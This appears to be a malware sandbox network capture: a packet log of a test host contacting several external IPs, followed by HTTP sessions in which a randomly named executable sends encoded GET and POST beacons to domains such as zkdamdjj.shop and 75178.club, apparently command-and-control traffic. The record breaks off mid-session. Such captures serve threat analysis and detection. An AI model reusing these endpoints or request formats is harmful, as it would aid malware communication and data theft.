Nov 20, 2024 09:23:43.375631094 CET | 49986 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:43.943821907 CET | 49986 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:44.960473061 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:44.966564894 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:44.966753960 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:44.979999065 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:44.990020990 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:44.990065098 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:45.900249004 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:45.900316954 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:45.900366068 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:45.900424957 CET | 80 | 49987 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:45.900471926 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:46.494824886 CET | 49987 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:47.507538080 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:47.512775898 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:47.512867928 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:47.522109985 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:47.527286053 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:48.478888988 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:48.478913069 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:48.478930950 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:48.479087114 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:48.479137897 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:48.481606960 CET | 49988 | 80 | 192.168.2.10 | 202.92.5.23
Nov 20, 2024 09:23:48.489974976 CET | 80 | 49988 | 202.92.5.23 | 192.168.2.10
Nov 20, 2024 09:23:53.643879890 CET | 49989 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:53.648948908 CET | 80 | 49989 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:53.649072886 CET | 49989 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:53.662223101 CET | 49989 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:53.667155981 CET | 80 | 49989 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:54.162729979 CET | 80 | 49989 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:54.162880898 CET | 80 | 49989 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:54.162946939 CET | 49989 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:55.176402092 CET | 49989 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:56.194850922 CET | 49990 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:56.199866056 CET | 80 | 49990 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:56.200063944 CET | 49990 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:56.214131117 CET | 49990 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:56.218975067 CET | 80 | 49990 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:56.721313953 CET | 80 | 49990 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:56.721498966 CET | 80 | 49990 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:56.721604109 CET | 49990 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:57.723279953 CET | 49990 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:58.742038965 CET | 49991 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:58.748330116 CET | 80 | 49991 | 194.195.220.41 | 192.168.2.10
Nov 20, 2024 09:23:58.748444080 CET | 49991 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:58.763293982 CET | 49991 | 80 | 192.168.2.10 | 194.195.220.41
Nov 20, 2024 09:23:58.768213987 CET | 80 | 49991 | 194.195.220.41 | 192.168.2.10
                                                                      Nov 20, 2024 09:23:58.768354893 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.261960983 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.261984110 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.262057066 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:00.270240068 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.314515114 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.319720984 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.319854975 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.329334021 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.334423065 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853827000 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853849888 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853861094 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.854135036 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.856889009 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.861792088 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:07.648355007 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.654073000 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:07.654187918 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.672748089 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.678847075 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523195028 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523250103 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523389101 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:09.178334951 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.195574045 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.200712919 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:10.200874090 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.219264984 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.224102020 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079086065 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079201937 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079278946 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:11.723412037 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.742249966 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.747397900 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:12.747502089 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.761512041 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.766612053 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:12.766637087 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633373022 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633392096 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633466959 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:14.270304918 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.288923025 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.293751001 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:15.293857098 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.302953959 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.310801983 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165601015 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165615082 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165791988 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:16.169702053 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:16.174634933 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:21.224008083 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.229523897 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.229624033 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.241427898 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.247159004 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911703110 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911828995 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911912918 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.911935091 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911979914 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:22.754789114 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.773471117 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.781034946 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:23.781166077 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.795907021 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.803224087 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418405056 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418519020 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418548107 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418704987 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:24.418704987 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:25.301655054 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.321312904 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.345156908 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.345345974 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.367635012 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.373112917 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.373127937 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987242937 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987265110 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987576008 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:27.880261898 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.898072004 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.903081894 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:28.903187990 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.911557913 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.917720079 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.561872005 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.562303066 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.562489033 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:29.564882994 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:29.570100069 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:34.980343103 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:34.985496044 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:34.987134933 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:35.067323923 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:35.076626062 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861618996 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861738920 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861835957 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:36.582813025 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.602508068 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.607412100 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:37.607614040 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.623658895 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.628582001 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.485940933 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.485963106 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.486166954 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:39.129719973 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.148696899 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.153656960 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:40.153768063 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.167831898 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.174999952 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:40.175012112 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033252001 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033381939 CET8050003118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:41.033463001 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:41.676934004 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.697005987 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.703546047 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:42.703655005 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.712119102 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:42.718616962 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602325916 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602510929 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:43.602677107 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:43.605178118 CET5000480192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:43.613132000 CET8050004118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:48.818126917 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.823229074 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:48.823357105 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.837893963 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:48.843003988 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431021929 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431046963 CET8050005209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:49.431121111 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:50.348534107 CET5000580192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.366964102 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.372190952 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.372347116 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.385857105 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:51.390907049 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957765102 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957789898 CET8050006209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:51.957863092 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:52.895467997 CET5000680192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.913747072 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.918874979 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:53.918999910 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.930926085 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:53.935823917 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:53.935978889 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511640072 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511662960 CET8050007209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:54.511773109 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:55.442580938 CET5000780192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.461431026 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.467364073 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:56.467493057 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.477067947 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:56.482697010 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083714962 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083790064 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:24:57.083906889 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:57.086685896 CET5000880192.168.2.10209.74.77.109
                                                                      Nov 20, 2024 09:24:57.091593981 CET8050008209.74.77.109192.168.2.10
                                                                      Nov 20, 2024 09:25:02.119355917 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.124342918 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.124432087 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.137579918 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:02.142879963 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842266083 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842727900 CET8050009188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:02.842935085 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:03.645983934 CET5000980192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.664511919 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.669923067 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:04.671266079 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.685705900 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:04.690648079 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.414819002 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.414849997 CET8050010188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:05.415107012 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:06.192327976 CET5001080192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.210972071 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.216159105 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.216294050 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.229406118 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:07.234611034 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.234658957 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927017927 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927618980 CET8050011188.114.96.3192.168.2.10
                                                                      Nov 20, 2024 09:25:07.927700996 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:08.739578009 CET5001180192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.758260965 CET5001280192.168.2.10188.114.96.3
                                                                      Nov 20, 2024 09:25:09.763442993 CET8050012188.114.96.3192.168.2.10
Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.10 | 49847       | 188.114.97.3   | 80               | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp                           | Bytes transferred | Direction | Data
Nov 20, 2024 09:22:54.631941080 CET | 494               | OUT       | GET /vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zkdamdjj.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 20, 2024 09:22:55.944574118 CET | 1236              | IN        | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 20 Nov 2024 08:22:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      x-redirect-by: WordPress
                                                                      location: https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP
                                                                      x-litespeed-cache-control: public,max-age=3600
                                                                      x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.a6d5303f744e03a41043b4a748aa35ee,02a_
                                                                      x-litespeed-cache: miss
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNiHXsjVAte7m8x96i6u%2Fsyzo755dDt6LjKyQ8GUGTWOvmIbrlbcCiT8zzFSMMN0GsppbNXc4j%2FdT1OpFKf06%2BQfXHjNbaHm%2Bin1Dr3lN9IIjF6s1LbzUfwbK28OV0zWjVeJ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e5708f1ea358c3f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&
Nov 20, 2024 09:22:55.944843054 CET | 12                | IN        | Data Raw: 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: =0"0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.10 | 49961       | 23.167.152.41  | 80               | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp                           | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:12.760330915 CET | 741               | OUT       | POST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: prh4=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa1OJFCouKNupxms5Kls1pacqG0tq


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.10 | 49977       | 23.167.152.41  | 80               | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp                           | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:15.314382076 CET | 765               | OUT       | POST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: prh4=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEURW7RUTB/MLkWSQyZpIYzNMecpWF663n+u4AMTdPMbdKXBYBijX8Y7or6gk21KElf9PLfTEI0vV+otyshBH6/56I4L3J86o0n8xWrP0efzTydkICqhYtV5jQ1CZBksRbtOQ7nR+b0Ni6tAkIyYAtsZDGiEw/KeIZm7wIS71lg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49978 | 23.167.152.41 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:23:17.856843948 CET | 1778 | OUT | POST /a4h7/ HTTP/1.1
